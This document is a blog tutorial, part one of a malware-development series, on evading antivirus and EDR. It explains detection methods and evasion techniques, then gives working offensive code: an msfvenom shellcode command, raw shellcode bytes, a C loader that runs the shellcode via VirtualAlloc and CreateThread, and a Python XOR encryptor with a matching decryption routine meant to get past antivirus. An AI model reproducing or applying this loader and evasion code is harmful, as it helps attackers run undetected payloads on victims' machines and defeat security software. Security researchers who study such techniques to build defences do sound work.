AV/EDR Evasion | Malware Development

Hello! Welcome to our thrilling playlist dedicated to understanding the art of evading anti-virus solutions. Have you ever wondered how hackers manage to slip past the watchful eyes of AV software? In this series, we will guide you through the creation of your first basic malware, while also exploring fundamental concepts and techniques. Join us on this educational journey as we demystify the world of AV evasion and equip you with invaluable knowledge.

7 min readFeb 17, 2023

To build our malware we need to understand some basics like:

1 — What is Malware Analysis steps
2 — How AV or Anti-Virus Detect Malicious Programs or Codes
3 — What is AV Evasion Techniques (On-Desk — In-Memory)
4 — Let’s Write our Malware in “C” — Practical Time

What is malware analysis steps?

1 — Static Analysis → Basically without any complex it’s the step that we start to analysis the malware or program without open it, We look for many things in malware in static analysis step like (PE Header, Strings, File Information's).
2 — Dynamic Analysis → Now we can say it’s the process that we analyzing the malware after running the malware, We look for many things like the “System changes” and we “Monitoring Behaviors” to see what the malware do.

In this image is a simple dynamic analysis that analyzing network traffic.

Note: There are 4 steps after there are (Static Analysis — Dynamic Analysis — Advanced Static Analysis — Advanced Dynamic Analysis) But you can search :)

Now we will talk about how AV Detect Malwares.

Anti-Virus Have main 3 steps to detect the malwares:

1 — Signature based detection → This technique involves comparing files and network traffic to a database of known malware signatures. If a match is found, the file or traffic is flagged as potentially malicious.

In this image you will see some hex’s, for example if the AV compare a part of these hex’s will know if it malicious…

2 — Heuristic based detection → This technique involves using machine learning and artificial intelligence to analyze the behavior of files and network traffic. If a file or traffic exhibits suspicious behavior, it may be flagged as potentially malicious, Also this technique you can say is reading the code instructions.

3 — Behavioral based detection → This technique involves analyzing the behavior of files and network traffic over time to identify patterns of malicious activity. If a file or traffic exhibits behavior that is significantly different from what is expected, it may be flagged as potentially malicious.

In this image we are monitoring the tasks, when the av feel there is many tasks open or potentially malicious it will detected by “Behavioral Based Detection”

AV Evasion Techniques :

We have 2 main topics (on desk — In memory) such as :

(1) On-Desk:

Packers → Packing malwares is like compressing the file to contain new instructions and file size that will Evade “Signature based detection”
Obfuscators → It obfuscating the blacklisted functions for example (VirtualAlloc — VirtualProtect, and more…) that will evade “Heuristic Detection” that it’s instructions can’t be reading well from AV Solution
Protectors → That complexing the reverse engineering process of the malware, The Protectors is a normal app that wasn’t designed to used in Evasion but it useful

(2) In-Memory:

Remote Process Memory Injection :We Inject Our Process or Payload Into A Normal Process, to use this technique we need some APIs like :

Reflective DLL Injection : Injection technique that allows a DLL to be loaded into a process’s memory without calling the standard Windows APIs for loading DLLs. This can be useful in situations where the traditional methods of DLL injection are not possible due to restrictions or security measures. Reflective DLL Injection works by using a technique known as manual mapping. The basic idea is to map the DLL into memory and execute it directly, without using the standard Windows API calls. This allows the DLL to run without triggering security alerts or being detected by anti-virus software.
Process Hollowing: We Make Fake Process That Take Space Then We Stop It And Change It’s Content To Our Payload And We Continue The Process Again With His New Instruction & Content
Inline Hooking : is a technique that involves modifying the code of a process while it is running in memory. This is done by redirecting function calls from the original code to a different location in memory.

There are more techniques but these are the famous techniques that used.

Writing basic Malware.

In any malware we put first the shellcode, so what is the shellcode!? → it is some bytes that the CPU & RAM can understand it, The shellcode contain a process that you want and to generate it you can open you Terminal and Type…

msfvenom -p windows/exec CMD=calc.exe -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -i 10 -f c

In This Command Line command it use msfvenom tool (Metasploit) to generate a shellcode that run calculator you can change it to run “Reverse Shell” You can search how to do it

So How to put it in our c code ?, Easly you will put it in variable like this :

unsigned char shellcode[] = {"Put here your shellcode"};
unsigned int shellcode_len = sizeof(shellcode); // To get the size of the shellcode

So Now we put the shellcode and we handle it so now what we will do next!, We need to inject the shellcode in the memory and run it so how we can do it?

void main() /* The Main Function */

{
        void* exec_mem; // Memory Buffer For Payload/Shellcode 
        HANDLE th; 
        DWORD oldprotect = 0;

        exec_mem = VirtualAlloc(0, shellcode_len , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); /* Allocate a memory buffer for payload */
        RtlMoveMemory(exec_mem, shellcode, shellcode_len); /* Copy/Move payload to buffer or Memory */

        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0);
        WaitForSingleObject(th, -1);

    

}

In this code creates a new thread and executes a block of shellcode in it. The shellcode is stored in the shellcode variable and is copied to a memory buffer using the VirtualAlloc and RtlMoveMemory functions. The PAGE_EXECUTE_READWRITE flag is used to allow the shellcode to be executed from the memory buffer. Finally, the CreateThread function is used to create a new thread, and the WaitForSingleObject function is used to wait for the thread to finish executing the shellcode. It's important to note that executing shellcode in this way can be dangerous and is often associated with malicious activities.

It is Detectable Right!

Obfuscating & Encrypting Malware to be Undetectable.

So, if you write the code that I mentioned before and if you tried to Runit it will told you that is virus! so what we will do?

The first thing that was malicious is the code is the “shellcode” so we need to encrypt it and obfuscate it to be incomprehensible from AV Solutions so we need to encrypt it, BUT HOW!?

Let’s make a small python script that is encrypting shellcodes and make the output in C format.

# Put your shellcode in data variable.

data = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50"
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26"
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7"
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78"
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3"
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3"
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a"
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d"
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb"
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

key  = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...

print('{ ', end='')
for i in data:
    print(hex(i ^ key), end=', ')

print("0x0 };") # Notice that it adds one byte "0x0" to the end.

It is very simple script that encrypting shellcode.

So, Now you can change your shellcode to it, it will be like this

unsigned char shellcode[] = {0xac, 0xb8, 0xd2, 0x50, 0x50, 0x50, 0x30, 0xd9, 0xb5, 0x61, 0x90, 0x34, 0xdb, 0x0, 0x0 };

So Try now to run it!, DAM it was detectable also it is not running calculator, First we will solve now this problem that the shellcode was encrypted and not understanded that it was running calc!

So we need to add decryption function it will be like this:

/* The Decryption Function */

void decrypt(char* shell, int nSize)
{
    for (int i = 0; i < nSize; i++)
    {
        shell[i] = shell[i] ^ KEY;
    }

}

Now we make the decryption function of the shellcode and you will add:

#define SIZEOF(x) sizeof(x) - 1
#define KEY 0x50

unsigned char shellcode[] = {0xac, 0xb8, 0xd2, 0x50, 0x50, 0x50, 0x30, 0xd9, 0xb5, 0x61, 0x90, 0x34, 0xdb, 0x0, 0x0 };
unsigned int shellcode_len = SIZEOF(shellcode);

And then go to the main function and add:

decrypt(shellcode, shellcode_len);

So, Now it is detectable right?, so we need to obfuscate functions like:

1 — VirtualAlloc
2 — CreateThread
3 — RtlMoveMemory

These functions are blacklisted to the Anti-Virus and we should obfuscate it! but we will add many things.

And now congratulations you have been finished the first writeup that contains the important basics you are in the end of the first writeup but this is not the last one you can continue reading from here :

This playlist was finished with four parts you can see it from here:

and finally the best one and the last one part 4 : AV/EDR Evasion | Malware Development P — 4 | by Hossam Ehab | May, 2023 | Medium

Thanks for reading :)